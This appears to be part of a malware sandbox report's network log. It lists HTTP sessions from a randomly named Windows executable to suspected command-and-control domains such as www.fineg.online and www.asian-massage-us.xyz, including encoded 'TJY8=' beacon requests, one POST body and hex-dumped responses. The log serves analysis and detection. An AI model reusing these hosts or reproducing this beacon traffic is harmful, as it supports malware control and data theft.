32 4e 4d 74 75 4a 49 6f 69 42 42 66 70 6d 68 31 77 6b 70 6e 33 43 38 38 37 45 74 45 71 30 6c 70 67 74 36 44 52 37 68 72 35 47 72 4f 39 6d 4a 39 43 53 68 53 45 67 54 7a 66 6b 2f 67 42 45 6a 47 43 79 63 [TRUNCATED]
                      Data Ascii: TJY8=z8pzi1wICkJUoW4OmiJ52D17AzOWdqMkPvdDs4sxdaqwv1SoJer9yHCWXvAM2udoEjwBd4sieYmD4PS231d5ogBzuasl9kMyYrIdG6utkpXavVUjGXvr+m3rYozT54ejek/hMpULj4K/TlQIQoRnUJlyyTHxcI0kJ5bA5ZzBPfe5rnosMXmvfWDEU+kitqXLbhLrYrOcvC69HKDOt9n2aeitUgdECns7865z6YWxtx55HvtyDw4MY5Z5To7L+PkEOV+maoWx7T2NMtuJIoiBBfpmh1wkpn3C887EtEq0lpgt6DR7hr5GrO9mJ9CShSEgTzfk/gBEjGCycrcRaWbcQHUP/bmG+M/zo/cTjzEi87ynbpo/+fY/bM+zFVWaVQ8nOuoBPEE3EbLPgzL+WK5O03S00sP8kdHGt/iyZGx9E/Qfl9cM/Ms4BamAWQURDcWqLWEvb2dHESxVM8n41X/CJlT3d7q8pU7gGna6oFHyGzG4yYeoStuwDRLG7lp2ARZRUngzsU8ecACgJJzkUlJZJVIIdzLMKY0hN5fS+3RwBNRRe4ho5nML6sk1r9Qd36kM/hdcAdYbZJs6Gby++3VyOhVSRY2SlunG+38auC9RrUs6Y0T7EdKa8APrQqG31lAvk8JDyxYEmDajrHBGpsbJSh/5Mx/OI5Nu2PvSukaB04xoEbtAEDcbD+zzMYVocvdA3v7B5LIadsKCKQajCBT8EK65B5U4qteffjhhjG+fmpxiXleTKeVIPKjGiOKV1UHyAu2yIDXDoUecLfklpJoWVvwVAQWjwRLB++Zf60MfvC9n3oSShak+tyYsAuhVM+hAJ8ZauFeSKtPCvbLwJKlZ4KpNPAGfhTddPImpJUEOl2tafzfxl+YWiAcrbZz4ZsCoefLqCyA9IJGmX8gJji5enkUB0tOJrI5AN7aU4dvkSyP+p8wCzUGbBdifMn1BJTdJmSWLq5BgNa5jfbMkoyjGuqcCd1mZ8eJugRk6XYA/T45r9D1 [TRUNCATED]
                      Sep 3, 2024 12:47:05.845719099 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 03 Sep 2024 10:47:05 GMT
                      Server: Apache
                      Content-Length: 18121
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                      Sep 3, 2024 12:47:05.845751047 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                      Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                      Sep 3, 2024 12:47:05.845762014 CEST1236INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                      Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                      Sep 3, 2024 12:47:05.845778942 CEST1236INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 32 39 2e 38
                      Data Ascii: ath class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                      Sep 3, 2024 12:47:05.845788956 CEST1236INData Raw: 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d
                      Data Ascii: ss="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M830 282.4h
                      Sep 3, 2024 12:47:05.845802069 CEST1236INData Raw: 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63
                      Data Ascii: -6.8 25.2h3z"/> <path class="st2" d="M640 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M630 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M620 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M610 282.4h-3l-6.8 25.2h3z"/> <pa
                      Sep 3, 2024 12:47:05.845813990 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 37 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                      Data Ascii: /> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-350.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-340.2 282.4h-3l-6.8 25.2h3z"/>
                      Sep 3, 2024 12:47:05.845828056 CEST108INData Raw: 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 36 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33
                      Data Ascii: 2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/> <path class="st
                      Sep 3, 2024 12:47:05.845837116 CEST1236INData Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                      Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                      Sep 3, 2024 12:47:05.845841885 CEST224INData Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                      Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="s
                      Sep 3, 2024 12:47:05.850970030 CEST1236INData Raw: 74 32 22 20 64 3d 22 4d 34 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38
                      Data Ascii: t2" d="M410 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M400 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M390 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M380 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M370 282


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.449753162.0.239.141801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:07.757998943 CEST452OUTGET /mkan/?TJY8=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&3L7=cfJLLBshpRPDzp HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.fineg.online
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:47:08.341888905 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 03 Sep 2024 10:47:08 GMT
                      Server: Apache
                      Content-Length: 18121
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                      Sep 3, 2024 12:47:08.341905117 CEST1236INData Raw: 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20
                      Data Ascii: .2s54.7-28 117.5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d=
                      Sep 3, 2024 12:47:08.341914892 CEST1236INData Raw: 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38
                      Data Ascii: class="st2" d="M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
                      Sep 3, 2024 12:47:08.341924906 CEST1236INData Raw: 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                      Data Ascii: .2h3z"/> <path class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <p
                      Sep 3, 2024 12:47:08.341936111 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22
                      Data Ascii: > <path class="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                      Sep 3, 2024 12:47:08.341979980 CEST1236INData Raw: 22 4d 36 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a
                      Data Ascii: "M650 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M640 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M630 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M620 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M610 282.4h-3l-6.8 25.
                      Sep 3, 2024 12:47:08.341991901 CEST776INData Raw: 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 37 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20
                      Data Ascii: 3l-6.8 25.2h3z"/> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-350.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-340.2 282.4h-3l-
                      Sep 3, 2024 12:47:08.342001915 CEST1236INData Raw: 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a
                      Data Ascii: .4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h
                      Sep 3, 2024 12:47:08.342011929 CEST1236INData Raw: 73 74 32 22 20 64 3d 22 4d 2d 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 30 2e 32 20 32 38 32 2e 34 68 2d 33
                      Data Ascii: st2" d="M-40.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-30.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
                      Sep 3, 2024 12:47:08.342021942 CEST1236INData Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                      Data Ascii: h3z"/> <path class="st2" d="M330 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M320 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M310 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M300 282.4h-3l-6.8 25.2h3z"/> <p
                      Sep 3, 2024 12:47:08.347678900 CEST1236INData Raw: 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a
                      Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M110 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M100 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M90 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M80 282.4h-3l-6.8 25.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.449754199.59.243.226801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:13.681910038 CEST738OUTPOST /kc69/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.asian-massage-us.xyz
                      Origin: http://www.asian-massage-us.xyz
                      Referer: http://www.asian-massage-us.xyz/kc69/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2b 43 68 30 6d 4f 64 71 70 36 63 48 54 6b 46 66 7a 57 36 69 6d 30 78 6a 73 67 47 6c 44 32 50 79 46 2b 75 4b 59 6d 74 73 5a 52 31 78 2f 6d 64 2b 71 46 48 6d 56 31 2f 68 48 6d 5a 38 76 4d 54 54 2f 4c 4b 61 62 6a 2b 64 51 62 7a 42 6a 66 6d 34 4d 32 6a 59 35 34 77 38 58 48 52 36 62 33 77 79 77 61 30 75 6f 2b 37 6f 38 4b 4b 39 65 35 48 47 68 61 63 39 56 37 76 68 30 51 44 4a 79 2b 45 52 5a 73 32 59 31 63 54 6b 66 45 34 66 38 42 41 64 43 6b 77 5a 48 61 5a 62 35 62 76 34 50 6b 33 78 2b 51 68 50 62 58 2f 2b 4a 57 35 77 45 34 56 76 74 56 42 6e 63 51 3d 3d
                      Data Ascii: TJY8=AkBl0xNSGkvk+Ch0mOdqp6cHTkFfzW6im0xjsgGlD2PyF+uKYmtsZR1x/md+qFHmV1/hHmZ8vMTT/LKabj+dQbzBjfm4M2jY54w8XHR6b3wywa0uo+7o8KK9e5HGhac9V7vh0QDJy+ERZs2Y1cTkfE4f8BAdCkwZHaZb5bv4Pk3x+QhPbX/+JW5wE4VvtVBncQ==
                      Sep 3, 2024 12:47:14.122888088 CEST1236INHTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:47:14 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1146
                      x-request-id: 18dc0cc8-f883-491b-b69d-5b705b40ee5e
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                      set-cookie: parking_session=18dc0cc8-f883-491b-b69d-5b705b40ee5e; expires=Tue, 03 Sep 2024 11:02:14 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
